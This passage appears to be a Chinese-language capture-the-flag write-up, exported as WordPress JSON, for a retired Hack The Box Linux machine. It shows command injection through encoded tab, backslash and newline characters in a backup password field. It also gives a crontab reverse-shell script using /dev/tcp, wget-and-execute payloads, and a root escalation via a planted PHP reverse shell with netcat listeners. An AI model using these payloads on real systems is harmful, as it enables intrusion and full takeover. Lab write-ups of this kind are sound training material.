    \u56de\u5230PHP<\/code>\u7a0b\u5e8f\u4e0a\uff0c\u6211\u4eec\u53d1\u73b0\uff0c\u5373\u4f7fcleanEntry()<\/code>\u65b9\u6cd5\u8fc7\u6ee4\u4e86\u5927\u591a\u6570\u547d\u4ee4\u7ba1\u9053\u7b26\u548c\u5355\u53cc\u5f15\u53f7\uff0c\u751a\u81f3\u7a7a\u683c\uff0c\u6211\u4eec\u4f9d\u65e7\u53ef\u4ee5\u4f20\u5165\u5236\u8868\u7b26\u3001\u53cd\u659c\u6760\u548c\u6362\u884c\u7b26\u8fdb\u884c\u547d\u4ee4\u6ce8\u5165\u3002\u5b83\u4eec\u7684URL<\/code>\u7f16\u7801\u5206\u522b\u4e3a\uff1a%09<\/code>\u3001%5C<\/code>\u548c%0A<\/code>\u3002
    \n\u4e3e\u4e2a\u4f8b\u5b50\uff0c\u5047\u5982\u6211\u4eec\u8fd8\u662f\u5e0c\u671b\u6267\u884cls -lA<\/code>\u547d\u4ee4\uff0c\u6b63\u5e38\u60c5\u51b5\u4e0b\u539f\u547d\u4ee4\u4e3a\uff1a<\/p>\n
    zip -x '.\/backups\/*' -r -P $password $backupFile .  > $logFile 2>&1 &<\/code><\/pre>\n
    \u800c\u6211\u4eec\u53ef\u4ee5\u5bf9password<\/code>\u53c2\u6570\u8fdb\u884c\u547d\u4ee4\u6ce8\u5165\uff1a<\/p>\n
    111111%0Als%09%5C%0A-lA%0a<\/code><\/pre>\n
    \u8fd9\u6837\u5b9e\u9645\u6267\u884c\u7684\u547d\u4ee4\u4e3a\uff1a<\/p>\n
    \nzip -x '.\/backups\/*' -r -P 111111\nls  \\\n-lA\n$backupFile .  > $logFile 2>&1 &<\/code><\/pre>\n
    \u63a5\u4e0b\u6765\u6211\u4eec\u8fdb\u884c\u547d\u4ee4\u6ce8\u5165\u653b\u51fb\u3002\u9996\u5148\uff0c\u6211\u4eec\u5728\u672c\u5730\u521b\u5efa\u6076\u610f\u53cd\u5f39Shell<\/code>\u811a\u672c\u6587\u4ef6evil_cron.sh<\/code>\uff0c\u968f\u540e\u6253\u5f00SimpleHTTPServer<\/code>\u76d1\u542c\u548cnetcat<\/code>\u76d1\u542c\uff1a<\/p>\n
    #!\/bin\/bash\necho \"*\/1 * * * * \/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.7\/443 0>&1'\" | crontab<\/code><\/pre>\n
    \u63a5\u7740\u6253\u5f00BurpSuite<\/code>\uff0c\u5e76\u5728\u5907\u4efd\u521b\u5efa\u754c\u9762\u5185\u968f\u4fbf\u8f93\u5165\u4e00\u4e2a\u5bc6\u7801\uff0c\u70b9\u51fbCreate Backup<\/code>\u6309\u94ae\uff0c\u62e6\u622a\u8bf7\u6c42\u5305\uff1a
    \n\"\"
    \n\u968f\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u4e0b\u8f7d\u6076\u610f\u811a\u672c\u6587\u4ef6\u3001\u8d4b\u4e88\u6267\u884c\u6743\u9650\u5e76\u6267\u884c\u6076\u610f\u811a\u672c\u53cd\u5f39Shell<\/code>\u4e86\uff1a<\/p>\n
    password=111111%0Awget%09%5C%0Ahttp:\/\/10.10.14.7\/evil_cron.sh%09%5C%0A-O%09%5C%0A\/tmp\/evil_cron.sh%0A&backup=\npassword=111111%0Achmod%09%5C%0A755%09%5C%0A\/tmp\/evil_cron.sh%0A&backup=\npassword=111111%0A\/tmp\/evil_cron.sh%0A&backup=<\/code><\/pre>\n
    \u7b49\u5f85\u4e00\u4f1a\u513f\u540e\uff0c\u6210\u529f\u6536\u5230\u53cd\u5f39Shell<\/code>\uff1a
    \n\"\"<\/p>\n
    \n
    \u6743\u9650\u63d0\u5347<\/h1>\n
    \u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n
    \u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u53d1\u73b0\u5f53\u524d\u7528\u6237www-data<\/code>\u5728\u4e00\u4e2a\u540d\u4e3aispconfig<\/code>\u7684\u7528\u6237\u7ec4\u4e2d\u3002
    \n\u76f4\u63a5\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\uff0c\u5728\/var\/www\/<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u6307\u5411\u76ee\u5f55\/usr\/local\/ispconfig\/interface\/web\/<\/code>\u76ee\u5f55\u7684\u8f6f\u94fe\u63a5ispconfig<\/code>\uff0c\u67e5\u770b\u5176\u6587\u4ef6\uff0c\u53d1\u73b0\u8c8c\u4f3c\u4e3a\u53e6\u4e00\u4e2aPHP<\/code>\u7ad9\u70b9\uff1a
    \n\"\"
    \n\u540c\u65f6\uff0c\u6839\u636e\u76ee\u5f55\u5185\u6587\u4ef6\u6743\u9650\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\uff0c\u5f53\u524d\u7528\u6237www-data<\/code>\u53ef\u4ee5\u5728\/var\/www\/ispconfig\/temp\/<\/code>\u76ee\u5f55\u4e0b\u521b\u5efa\u4efb\u610f\u6587\u4ef6\uff0c\u56e0\u4e3a\u8be5\u76ee\u5f55\u5c5e\u4e8e\u7ec4ispconfig<\/code>\uff0c\u6743\u9650\u4e3a750<\/code>\u3002
    \n\u9274\u4e8e\u672a\u53d1\u73b0\u5176\u5b83\u53ef\u7591\u4fe1\u606f\uff0c\u76f4\u63a5\u4e0a\u4f20linpeas.sh<\/code>\u8fdb\u884c\u81ea\u52a8\u5316\u4fe1\u606f\u6536\u96c6\u3002<\/p>\n
    \u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n
    \u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong>
    \n\"\"
    \n\u8fdb\u7a0b\u5217\u8868<\/strong>
    \n\"\"
    \n\u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong>
    \n\"\"
    \n\u73af\u5883\u53d8\u91cf<\/strong>
    \n\"\"
    \n\u7528\u6237\u4fe1\u606f<\/strong>
    \n\"\"
    \n\u7528\u6237\u5bb6\u76ee\u5f55<\/strong>
    \n\"\"
    \n\u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong>
    \n\"\"
    \n\u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong>
    \n\"\"
    \n\u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong>
    \n\"\"
    \n\u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\u9776\u673aroot<\/code>\u7528\u6237\u6b63\u5728\u4f7f\u7528PHP<\/code>\u7b80\u6613Web<\/code>\u670d\u52a1\u5668\u76d1\u542c\u9776\u673a\u672c\u57308080<\/code>\u7aef\u53e3\uff0c\u547d\u4ee4\u4e3a\/usr\/bin\/php -S 127.0.0.1:8080<\/code>\u3002\u7ed3\u5408\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u9636\u6bb5\u7684\u76f8\u5173\u4fe1\u606f\uff0c\u6000\u7591\u8be5PHP<\/code>\u7b80\u6613\u7f51\u9875\u670d\u52a1\u5668\u7684\u76d1\u542c\u76ee\u5f55\u4e3a\/var\/www\/ispconfig\/<\/code>\u76ee\u5f55\u3002\u8fd9\u6837\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7\u5728\/var\/www\/ispconfig\/temp\/<\/code>\u76ee\u5f55\u4e0b\u4e0a\u4f20PHP<\/code>\u53cd\u5f39Shell<\/code>\u811a\u672c\u7684\u65b9\u6cd5\u8fdb\u884c\u6743\u9650\u63d0\u5347\u3002<\/p>\n
    \u5229\u7528\u8d85\u7ea7\u6743\u9650PHP Web\u670d\u52a1\u63d0\u6743<\/h2>\n
    \u9996\u5148\uff0c\u6211\u4eec\u5c06Kali Linux<\/code>\u7cfb\u7edf\u81ea\u5e26\u7684PHP<\/code>\u53cd\u5f39Shell<\/code>\u6728\u9a6cphp-reverse-shell.php<\/code>\u590d\u5236\u5230\u5de5\u4f5c\u76ee\u5f55\uff0c\u7f16\u8f91\u5176\u653b\u51fb\u673aIP<\/code>\u5730\u5740\u53c2\u6570\uff1a<\/p>\n
    set_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '10.10.14.7';  \/\/ CHANGE THIS\n$port = 4444;       \/\/ CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; \/bin\/sh -i';\n$daemon = 0;\n$debug = 0;<\/code><\/pre>\n
    \u7f16\u8f91\u5b8c\u6210\u540e\uff0c\u4f7f\u7528scp<\/code>\u5de5\u5177\u5c06\u5176\u4f20\u8f93\u5230\/var\/www\/ispconfig\/temp\/<\/code>\u76ee\u5f55\u4e0b\uff0c\u63a5\u7740\u5f00\u542fnetcat<\/code>\u76d1\u542c\u653b\u51fb\u673a4444<\/code>\u7aef\u53e3\uff1a<\/p>\n
    # On target machine:\nscp -P 22222 megumin@10.10.14.7:\/home\/megumin\/Documents\/pentest_notes\/nocturnal\/php-reverse-shell.php \/var\/www\/ispconfig\/temp\/php-reverse-shell.php\n# On local attack machine:\nrlwrap nc -l -p 4444 -s 10.10.14.7<\/code><\/pre>\n
    \u6700\u540e\u5728\u9776\u673a\u4e0a\u6267\u884ccurl<\/code>\u547d\u4ee4\u8bbf\u95eePHP<\/code>\u6728\u9a6c\uff1a<\/p>\n
    curl http:\/\/127.0.0.1:8080\/temp\/php-reverse-shell.php<\/code><\/pre>\n
    \"\"
    \n\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
    \n
    \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"
    \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.11.64 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.11.64 (10.10.11.64)  …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-248","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=248"}],"version-history":[{"count":9,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions"}],"predecessor-version":[{"id":257,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions\/257"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}